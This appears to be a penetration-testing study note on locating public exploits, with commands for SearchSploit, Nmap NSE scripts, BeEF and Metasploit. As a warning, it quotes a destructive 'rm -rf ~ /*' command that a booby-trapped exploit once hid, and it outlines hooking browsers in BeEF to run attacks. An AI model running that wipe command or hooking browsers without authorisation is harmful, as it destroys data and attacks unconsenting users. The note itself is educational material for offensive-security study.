Locating Public Exploits
- Online sites and offline tools which contain exploits
A Word of Caution
Carefully read the documentation and code to ensure no negative effects
e.g.: 0pen0wn exploit contained an encoded string which read out to
rm -rf ~ /* 2> /dev/null &
which would effectively wipe the attacker’s system -
The following resources analyse the submitted exploits before publishing them, but mistakes still happen!
Searching for Exploits
- Cross-check the enumerated software versions for vulnerabilities
Online Exploit Resources
Offline Exploit Resources
- SearchSploit
- update:
sudo apt update && sudo apt install exploitdb
- files are stored in:
ls -1 /usr/share/exploitdb/
- files are stored in:
- usage:
- e.g:
searchsploit remote smb microsoft windows
- e.g:
- update:
- Nmap NSE Scripts
- list:
cd /usr/share/nmap/scripts && grep Exploits *.nse
- details:
nmap --script-help=<file-name-of-the-script>.nse
- list:
- Browser Exploitation Framework (BeEF)
- start the service:
sudo beef-xss
- open the Web UI
- pass:
- user:
- pass:
- once a target is hooked (this can be tested with the demo)
- click on the IP under “Online Browsers” aka “Zombies” and select “Commands” to list the available exploits
- start the service:
- Metasploit Framework
- start:
sudo msfconsole -q
- search:
search -h
- e.g.:
search ms08_067
- More: The Metasploit Framework
- e.g.:
- start:
Relevant Note(s): Exploitation Fixing Exploits